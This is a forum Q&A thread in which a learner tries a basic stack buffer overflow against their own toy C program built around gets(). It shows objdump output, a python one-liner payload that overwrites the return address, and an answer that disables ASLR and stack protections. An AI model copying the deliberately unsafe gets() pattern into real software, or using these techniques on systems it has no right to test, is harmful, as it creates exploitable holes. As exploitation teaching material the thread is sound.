# Problem exploiting Buffer Overflow in a simple C program

Tags: exploit, buffer-overflow, c

I am new to Buffer Overflow exploits and I started with a simple C program.
My program is as follows :

```
#include <stdio.h>
#include <strings.h>


void execs(void){
    printf("yay!!");
}

void return_input (void)
{
    char array[30];
    gets(array);
}

int main()
{
    return_input();
    return 0;
}
```

I compiled the above program with cc by disabling `stack protector` as:

```
cc test.c -o test -fno-stack-protector
```

The dump of the elf file using `objdump` is as follows :

```
0804843b <execs>:
 804843b:   55                      push   %ebp
 804843c:   89 e5                   mov    %esp,%ebp
 804843e:   83 ec 08                sub    $0x8,%esp
 8048441:   83 ec 0c                sub    $0xc,%esp
 8048444:   68 10 85 04 08          push   $0x8048510
 8048449:   e8 b2 fe ff ff          call   8048300 <printf@plt>
 804844e:   83 c4 10                add    $0x10,%esp
 8048451:   90                      nop
 8048452:   c9                      leave  
 8048453:   c3                      ret    

08048454 <return_input>:
 8048454:   55                      push   %ebp
 8048455:   89 e5                   mov    %esp,%ebp
 8048457:   83 ec 28                sub    $0x28,%esp
 804845a:   83 ec 0c                sub    $0xc,%esp
 804845d:   8d 45 da                lea    -0x26(%ebp),%eax
 8048460:   50                      push   %eax
 8048461:   e8 aa fe ff ff          call   8048310 <gets@plt>
 8048466:   83 c4 10                add    $0x10,%esp
 8048469:   90                      nop
 804846a:   c9                      leave  
 804846b:   c3                      ret    

0804846c <main>:
 804846c:   8d 4c 24 04             lea    0x4(%esp),%ecx
 8048470:   83 e4 f0                and    $0xfffffff0,%esp
 8048473:   ff 71 fc                pushl  -0x4(%ecx)
 8048476:   55                      push   %ebp
 8048477:   89 e5                   mov    %esp,%ebp
 8048479:   51                      push   %ecx
 804847a:   83 ec 04                sub    $0x4,%esp
 804847d:   e8 d2 ff ff ff          call   8048454 <return_input>
 8048482:   b8 00 00 00 00          mov    $0x0,%eax
 8048487:   83 c4 04                add    $0x4,%esp
 804848a:   59                      pop    %ecx
 804848b:   5d                      pop    %ebp
 804848c:   8d 61 fc                lea    -0x4(%ecx),%esp
 804848f:   c3                      ret
```

So, In order to exploit the buffer(`array`), we need to find the number of bytes allocated in the `return_input` stack frame which by looking at the dump,

```
lea    -0x26(%ebp),%eax
```

is `0x26` in hex or roughly 38 in decimal. So, giving input as :

> 38+4(random chars)+(return addr of execs)

would execute the `execs` function. I used the following:

```
python -c 'print "a"*42+"\x3b\x84\x04\x08"' | ./test
```

But the output was:

> Segmentation fault(core dumped)

When I opened the `core`(core dumped file) using `gdb`, I could find that the segmentation fault was experienced when executing on the following address :

```
0xb76f2300
```

Ubuntu version : 16.10

Kernel version : 4.8.0-46-generic

What was I doing wrong?
Kindly help me out.

Thanks.

Comment: Thank you. But can you please elaborate your views..

Answer (score 3):

EDIT: I now beleive your kernel is in your way, but I'm not entirely sure how, see bottom for addendum.

ORIGINAL:
OK so i compiled my own version using your exact source code, i think your main problem is skipping a step in between objdump and using the address. Its always a good idea to make sure you are locating the correct address by finding it in gdb as well, sometimes we need to make sure the address we see in objdump is actually the one we encounter when running in gdb.

The rest of what you have done seems fine, and i tried to follow similar steps and was met with success:

found my function address and navigated to a spot nearby where the first push happens:

[image]

My address appears to be 0x00401460 cool. Now i figure out where i need my overflow to be, the method you used is great, im lazy and just did some trial and error:

[image]

after that it was just a matter of inserting my instruction into eip:

[image]

All in all, the only thing i did different than you was double check the EIP address i was using before attempting to exploit. That's the only thing i can think of that's messing you up. Because everything else you did looks correct, and i also ran into no trouble using your method.

EDIT:

Upon thinking about this more perhaps the real difference is our OS. Linux has protections against this sort of thing and a few things need to be addressed to allow overflows in compiled programs. There is another major difference and that is compiler.

I dont know what kernel version you have but try the following:

```
sysctl -w kernel.randomize_va_space=0
gcc prog.c -o prog -fno-stack-protector -D_FORTIFY_SOURCE=0 -z execstack
```

If that doesn't work, (first undo the sysctl command) then you can try an older kernel in a vm, like ubuntu 9 or something. Then try the above commands in there.

But I'm afraid I haven't tried to disable stack protection on more modern kernels. so I don't know if that would be enough to make this work. What I can say is this, I think you got it right. Something is just in your way and I'm not sure what it is. As far as the exploit goes, I see nothing wrong with what you did. Hopefully someone else can see the real problem more clearly, but what *i think* is going on here is that the OS level kernel protections are taking over preventing the overflow exploit from jumping to your desired address.

Comment: Thanks. I tried with the above command but still didn't work. I have also updated my kernel version in the question.

Comment: Thats what im afraid of though, what i think you may need is an older kernel. I'm not familiar enough with more recent kernels to say what canaries are in place, i know of a few like the ones in the commands above, but there could be, and probably are, others. I'll have to do more reading on the subject myself i think.